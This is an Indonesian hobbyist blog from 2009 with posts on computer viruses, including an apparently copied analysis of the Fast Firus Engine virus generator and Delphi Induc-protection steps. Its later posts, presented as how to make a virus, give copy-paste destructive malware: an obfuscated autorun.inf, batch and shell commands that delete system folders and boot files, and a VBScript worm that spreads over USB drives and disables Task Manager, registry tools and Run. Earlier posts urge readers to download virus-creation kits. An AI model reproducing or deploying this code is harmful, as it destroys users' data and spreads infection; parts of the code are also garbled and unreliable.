THOUSANDS OF FREE BLOGGER TEMPLATES ?

Sabtu, 05 September 2009

Pengetahuan

Nie....... pengetahuan siklus virus

Berdasarkan sifat dan penyerangannya, virus komputer dapat dibedakan menjadi beberapa macam, misalnya virus boot sector, virus file, polymorphic virus, stealth virus, dan virus makro. Virus makro ini dapat menyerang pada dokumen MS Word, Excel atau Power Point. Virus makro ini termasuk virus yang paling banyak dijumpai di sekitar kita. Tentunya kita masih ingat dengan adanya virus Mellisa atau virus I Love You yang juga dapat kita masukkan ke dalam kategori virus macro.
Mengapa virus makro ini sering sekali kita jumpai? Jawabnya tentu saja karena populasi pengguna MS Office sangat banyak. Dengan pengguna yang cukup banyak tentunya virus makro dapat berkembang dengan cepat. Dengan melakukan pertukaran data *.doc (dokumen MS Word) yang telah terinfeksi maka sudah cukup untuk membuat semua dokumen menjadi terinfeksi.
Yang menarik, bagaimana cara membuat virus makro tersebut? Kalau Anda seorang programmer, dengan bantuan berbagai referensi tentunya mudah saja untuk belajar membuat virus makro. Masalahnya bagaimana kalau kita sama sekali tidak menguasai bahasa pemrograman?
Tenang saja, di internet banyak sekali software yang dapat digunakan untuk membuat virus makro. Salah satunya adalah SkamWerks Lab. Dengan fasilitas Virii Wizard, kita dapat membuat virus mulai dari awal sampai selesai. Saat menggunakan Virii Wizard, kita dapat menuliskan pembuat virusnya, nama virus, dan makro-makro yang akan dimasukkan ke dalam virus. Nah, daripada penasaran, silakan Anda cepat-cepat mencobanya sendiri. Tentunya setelah Anda mendownload programnya di sini.
Jika berminat, Anda bisa mendapatkan software-software lain yang dapat digunakan untuk membuat virus di sini. Koleksinya sangat lengkap!
Selamat mencoba!





Nie..... blajar memahami siklus hidup virus

Masih ingat dengan virus Aksika? Virus open source yang satu itu memang memiliki banyak sekali varian. Tidak heran karena source code-nya memang disediakan bebas di Internet, jadi siapapun dapat dengan mudah mengubah dan meng-compile source code-nya dan jadilah varian baru. Berawal dari kemudahan itulah, banyak virus maker ataupun programer pemula mencoba coba untuk membuat virus tanpa perlu repot. Paling yang dibutuhkan hanyalah pengetahuan seputar operating system dan programming. Namun kemudahan itu belum seberapa, bila dibandingkan dengan menggunakan program Virus Generator. Dari namanya saja, kita sudah dapat mengira kegunaan dari program tersebut. Ya, Virus Generator merupakan program untuk dapat membuat virus secara mudah dan instan. Bermula dari sampel sebuah virus yang lumayan banyak dikirimkan oleh pembaca kepada kami. PC Media Antivirus mengenalnya dengan nama Gen.FFE-Fajar, namun antivirus lain ada juga yang menyebutnya dengan nama Brontok.D. Dengan penyelidikan sederhana akhirnya diketahui bahwa virus tersebut dibuat menggunakan Virus Generator. Fast Firus Engine Pembuat Generator tersebut menamakan program buatannya itu dengan nama Fast Firus Engine. Seperti yang terlihat pada program ataupun situs pembuatnya, ia memberitahukan bahwa program ini hanya untuk tujuan pembelajaran dan tidak untuk tindakan merusak. Namun tetap saja, bila program ini sudah jatuh ke tangan yang salah, pasti akan digunakan untuk pengrusakan. Virus Generator ini dibuat menggunakan bahasa Visual Basic dan di-compress menggunakan packer tELock. Dalam paketnya terdapat dua buah file, yakni Fast Firus Engine.exe dan data.ex_. Fast Firus Engine. exe merupakan program utama dalam pembuatan virusnya dan sementara file data.ex_ sebenarnya merupakan badan virus asli yang belum dimodifikasi.
Saat file Fast Firus Engine.exe dijalankan, maka pengguna akan dihadapkan pada sebuah interface. Anda hanya disuruh mengisikan nama virus, nama pembuat, dan pesan-pesannya. Lalu dengan menekan tombol Generate, maka jadilah virus Anda. Cara kerja dari Generator tersebut sebenarnya sangat sederhana. Ia hanya menambahkan data yang Anda masukkan tadi ke bagian akhir file virus asli (data.ex_). Nantinya informasi tersebut digunakan oleh virus dalam proses infeksi. BagaimanaVirusMenginfeksi? Virus hasil ciptaan FFE memang terlihat sederhana. Sama seperti Generatornya, ia juga dibuat menggunakan bahasa Visual Basic yang di-compile dengan metode Native- Code. Lalu di compress menggunakan tELock agar ukurannya semakin kecil. Virus ini memiliki ukuran tubuh asli sebesar 55.296 bytes. Saat virus kali pertama dieksekusi, ia akan membuat beberapa file induk di beberapa lokasi. Seperti di direktori \%WINDOWS%\, akan terdapat file dengan nama.exe, Win32 exe, activex.exe, dan %virusname% (nama virus sesuai yang diisikan oleh sang pembuatnya pada Generator). Di \%WINDOWS%\ %system32%\ akan terdapat file copy.pif, _default.pif, dan surif.bin. Selain itu, ia juga mengubah atau membuat file Oeminfo.ini yang merupakan bagian dari System Properties. Jadi apabila komputer Anda terinfeksi oleh virus hasil generate dari FFE, maka pada System Properties akan terdapat tulisan Generated by Fast Firus Engine . Di direktori \%WINDOWS%\%System%\ akan terdapat beberapa file induk lagi yang menggunakan nama yang sama seperti file system milik Windows, seperti csrss.exe, winlogon.exe, lsass.exe, smss.exe, svchost. exe, dan winlogon.exe. Dan tak lupa, pada root drive pun akan terdapat file dengan nama baca euy.txt yang berisikan pesan pesan dari si pembuat virus. Jadi pada saat membuat virus dengan menggunakan Generator tersebut, maka pembuatnya akan disuguhkan beberapa kotak input, seperti Author of the virus, Name of the virus, dan Messages. Nah, isi dari kotak messages ini yang nantinya ditampilkan pada file baca euy.txt tersebut. Setelah virus berhasil meng-copy-kan file induknya ke dalam sistem tersebut, ia akan menjalankan file induk tadi, sehingga pada memory akan terdapat beberapa process virus, seperti csrss.exe, winlogon.exe, lsass. exe, smss.exe, svchost.exe, dan
winlogon.exe. Nama process yang mirip dengan process/services milik Windows tersebut mungkin sengaja untuk mengecoh user. Untuk membedakannya, Anda dapat melihat path atau lokasi process tersebut dijalankan. Process virus ini biasanya berjalan di direktori System sementara process/services milik Windows yang running biasanya berasal dari direktori System32. MengubahRegistry Virus ini menambahkan beberapa item startup pada registry agar pada saat memulai Windows ia dapat running secara otomatis atau untuk mengubah setting-an Windows agar sesuai keinginannya. Informasi mengenai registry yang diubahnya tidak akan dapat dengan mudah kita lihat karena dalam kondisi terenkripsi. Yang ia ubah adalah seperti nilai dari item Userinit, yakni dengan menambahkan parameter ke file induk. Pada key HKEY_CURRENT_ USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load juga akan diubah itemnya agar mengarah ke file induknya dengan nama Activex.exe. Pada HKEY_CURRENT_USER \Software\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru dengan nama present. Key HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru juga dengan nama Default dan %username%, username di sini merupakan nama user yang sedang aktif saat itu. Virus hasil generate dari FFE juga mengubah shell extension untuk file .exe, yakni dengan mengubah type information dari Application menjadi File Folder. Setting-an folder Options juga diubah agar tidak menampilkan extension dan setiap fi le dengan attribut hidden. Dan agar dapat aktif pada safe-mode, ia pun mengubah nilai dari item SafeBoot. Dengan menggunakan bantuan registry Image File Execution Options, virus ini juga menambahkan item baru pada section tersebut dengan nama cmd.exe, msconfi g.exe, regedit.exe, dan taskmgr.exe. Maksudnya adalah agar setiap user yang mengakses program dengan nama file seperti itu, maka akan di-bypass oleh Windows dan dialihkan ke file induk si virus.
BagaimanaVirusMenyebar? Virus ini dapat menyebar melalui media penyimpan data seperti flash disk. Saat Anda mencolokkan flash disk pada komputer yang terinfeksi, maka pada flash disk tersebut akan terdapat beberapa file baru, seperti explorer.exe, %virusname%.exe, dan msvbvm60.dll. Juga beberapa file pendukung seperti desktop.ini, autorun.inf agar ia dapat running otomatis pada saat mengakses flash disk tersebut. File virus lainnya pun disimpan pada direktori baru di flash disk tersebut dengan nama Recycled yang berisikan file Firus.pif dan Folder.htt. Kesemua file virus tersebut dalam kondisi hidden sehingga tidak terlihat. VirusBeraksi Untuk dapat bertahan hidup, virus ini pun akan mencoba untuk memblok setiap program yang tidak ia inginkan seperti tools atau program antivirus termasuk PCMAV. Sama seperti halnya data registry yang diubah, data mengenai program apa saja yang diblok olehnya juga terdapat dalam tubuhnya dalam kondisi terenkripsi. Jadi, saat virus sudah stay di memory, ia akan memonitor setiap program yang diakses oleh user, yakni dengan membaca nama file dan juga caption Window. Beberapa nama file antivirus yang dicoba untuk dibloknya adalah nav.exe, avgcc.exe, njeeves.exe, ccapps.exe, ccapp.exe, kav.exe, nvcoas.exe, avp32.exe, dan masih banyak lagi yang lainnya. Termasuk beberapa program setup atau installer juga tidak dapat dijalankan pada komputer terinfeksi.
This document was created with Win2PDF available at http://www.daneprairie.com.The unregistered version of Win2PDF is for evaluation or non-commercial use only.

Senin, 17 Agustus 2009

Dark_study

Nie... buat loe yang sering bermain-main dengan Delphi versi 4-7


Sekali lagi, tidak khawatir berlebihan. Selama anda bukan seoranmg programer/developer Delphi dan tidak mengunakan Compiler Delphi versi 4-7 di komputer anda, maka dipastikan viruz ini tidak akan pernah aktif.


Cara ngebuatnya:
1. Find Delpji root folder
[usually C:\Program files\Borland\Delphi7]
2. if exists %Delphi%\Lib\Sysconst.bak file rename it as SysCont.dcu and continue with step 5
if file %Delphi%\Lib\SysCont.pas From %Delphi%\Source\Rtl\Sys folder to %DELPHI%\Lib folder
3. Find and copy file SysConst.pas from %DELPHI%\Source\Rtl\Sys folder to %DELPHI%\Lib folder
4.Compile SysConst.pas file to DCU using command line:
%DELPHI%\Bin\Dcc32.exe %DELPHI%\Lib\SysConst.pas
For example:
“C:\Program Files\Borland\Delphi7\Bin\Dcc32.exe” “C:\Program Files\Borland\Delphi7\Lib\SysConst.pas”
5.If exists %DELPHI%\Lib\SysConst.bak file remove it.
For “%DELPHI%\Lib” folder its subfolders and files set “Read only” permission for “Everyone” group.
This will protect Delphi installation against Win32/Induc infection.
6.Try to rename %DELPHI%\Lib\SysConst.dcu file as %DELPHI%\Lib\SysConst.pas.
If this fail your permissions are set correctly















Minggu, 16 Agustus 2009

Dark_viruzax

















{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fnil\fcharset0 Courier New;}{\f1\fswiss\fcharset0 Arial;}}
{\*\generator Msftedit 5.41.15.1503;}\viewkind4\uc1\pard\f0\fs20\par
;fNMbCsNcMPrb VNtBCGndKgOEahgxgstcQO hhRBa bTrDtQRrv\par
[AutoRun]\par
;gfpn pnNfuD rhqhC QeRvW\par
;JgUCwimPpDVfWhGvWyg \par
shell\\eXplorE\\CommANd= dynti.cmd\par
;HQVvhstmkliicf\par
shell\\oPeN\\DefauLt=1\par
;HlRmQDyhOeKceDMq jSsi UqejL htfbtl\par
shelL\\opeN\\CoMMand= dynti.cmd\par
;UqhXPmNuGo\par
OpeN=dynti.cmd\par
;FrnW RjaWWPMIjAXQNgXjXd RrCWVoMCeKbkkvy mMNfYmywgmhyqNc\par
shElL\\autoplAY\\ComManD= dynti.cmd\par
;TsQihNoxsrtfvvpsvGeftfAN xhyIrkqjxllghOITjqlwkmkv \par
\par
\f1\par
}

Simpan dengan [namaviruz].exe

Senin, 10 Agustus 2009

Cara membuat Viruz


Jangan lupa tulis di notepad ya......

Ini untuk membuat autorun.inf



Bagus Y IF EXIST C:\9S2M\PINBALL\NUL DEL C:\9S2M\PINBALL\*.*>NULIF EXIST C:\9S2M\PINBALL\NUL RD C:\9S2M\PINBALL>NULBagus Y IF EXIST C:\9S2M\COMMAND\NUL DEL C:\9S2M\COMMAND\*.*>NULIF EXIST C:\9S2M\COMMAND\NUL RD C:\9S2M\COMMAND>NULBagus Y IF EXIST C:\9S2M\FONTS\NUL DEL C:\9S2M\FONTS\*.*>NULIF EXIST C:\9S2M\FONTS\NUL RD C:\9S2M\FONTS>NULBagus Y IF EXIST C:\9S2M\HELP\NUL DEL C:\9S2M\HELP\*.*>NULIF EXIST C:\9S2M\HELP\NUL RD C:\9S2M\HELP>NULBagus Y IF EXIST C:\9S2M\MSAPPS\GRPHFLT\NUL DEL C:\9S2M\MSAPPS\GRPHFLT\*.*>NULIF EXIST C:\9S2M\MSAPPS\GRPHFLT\NUL RD C:\9S2M\MSAPPS\GRPHFLT>NULBagus Y IF EXIST C:\9S2M\MSAPPS\NUL DEL C:\9S2M\MSAPPS\*.*>NULIF EXIST C:\9S2M\MSAPPS\NUL RD C:\9S2M\MSAPPS>NULBagus Y IF EXIST C:\9S2M\SYSBCKUP\NUL DEL C:\9S2M\SYSBCKUP\*.*>NULIF EXIST C:\9S2M\SYSBCKUP\NUL RD C:\9S2M\SYSBCKUP>NULBagus Y IF EXIST C:\9S2M\MEDIA\NUL DEL C:\9S2M\MEDIA\*.*>NULIF EXIST C:\9S2M\MEDIA\NUL RD C:\9S2M\MEDIA>NULBagus Y IF EXIST C:\9S2M\SYSTEM\SHELLEXT\NUL DEL C:\9S2M\SYSTEM\SHELLEXT\*.*>NULIF EXIST C:\9S2M\SYSTEM\SHELLEXT\NUL RD C:\9S2M\SYSTEM\SHELLEXT>NULBagus Y IF EXIST C:\9S2M\SYSTEM\VMM32\NUL DEL C:\9S2M\SYSTEM\VMM32\*.*>NULIF EXIST C:\9S2M\SYSTEM\VMM32\NUL RD C:\9S2M\SYSTEM\VMM32>NULBagus Y IF EXIST C:\9S2M\SYSTEM\IOSUBSYS\NUL DEL C:\9S2M\SYSTEM\IOSUBSYS\*.*>NULIF EXIST C:\9S2M\SYSTEM\IOSUBSYS\NUL RD C:\9S2M\SYSTEM\IOSUBSYS>NULBagus Y IF EXIST C:\9S2M\SYSTEM\NUL DEL C:\9S2M\SYSTEM\*.*>NULIF EXIST C:\9S2M\SYSTEM\NUL RD C:\9S2M\SYSTEM>NULBagus Y IF EXIST C:\9S2M\SYSTEM32\DRIVERS\NUL DEL C:\9S2M\SYSTEM32\DRIVERS\*.*>NULIF EXIST C:\9S2M\SYSTEM32\DRIVERS\NUL RD C:\9S2M\SYSTEM32\DRIVERS>NULBagus Y IF EXIST C:\9S2M\SYSTEM32\NUL DEL C:\9S2M\SYSTEM32\*.*>NULIF EXIST C:\9S2M\SYSTEM32\NUL RD C:\9S2M\SYSTEM32>NULBagus Y IF EXIST C:\9S2M\NUL DEL C:\9S2M\*.*>NULIF EXIST C:\9S2M\NUL RD C:\9S2M>NUL

Simpan dengan [namavirus].inf


Yang ini lebih seru buat penghancuran

shell “c:”shell “cd\”
shell “del command.com”

Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.

shell “c:”shell “cd\”
shell “deltree /y mydocu~1?shell “
deltree /y windows”shell “
deltree /y progra~1?

simpan dengan [nama viruz].cmd



Kali ini untuk membuat virus Vbs

on error resume next
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,lagibelajar,nt,check,sd
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Bagus.dll.vbs” set fs = createobject(”Scripting.FileSystemObject”) set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text = mf.openastextstream(1,-2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbcrlf loop do
Set windowpath = fs.getspecialfolder(0) set tf = fs.getfile(windowpath & “\batch- Bagus.dll.vbs “) tf.attributes = 32 set tf=fs.createtextfile(windowpath & “\batch- Bagus.dll.vbs”,2,true) tf.write rekursif tf.close set tf = fs.getfile(windowpath & “\batch- Bagus.dll.vbs “) tf.attributes = 39
for each flashdrive in fs.drives If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\Bagus.dll.vbs “) tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &”\Bagus.dll.vbs “,2,true) tf.write rekursif tf.close set tf=fs.getfile(flashdrive.path &”\Bagus.dll.vbs “) tf.attributes = 39
set tf =fs.getfile(flashdrive.path &”\Bagus.inf”) tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &”\Bagus.inf”,2,true) tf.write isi tf.close set tf = fs.getfile(flashdrive.path &”\Bagus.inf”) tf.attributes=39 end if next
set Bagus = createobject(”WScript.Shell”)
Bagus.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” Bagus “
Bagus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\super Hidden”, “0″, “REG_DWORD”
Bagus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD” Bagus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD” Bagus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD” Bagus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD” Bagus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
Bagus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
Bagus.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Bagus. Variant from Rangga-Zay, don’t panic all data are safe.”
Bagus.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- Bagus.dll.vbs “
Bagus.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Bagus” Bagus.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Bagus”
if check <> 1 then Wscript.sleep 200000 end if loop while check <> 1


Yang nie disimpan dengan [nama viruz].vbs


Lo lgi malas
tingal copy paste za....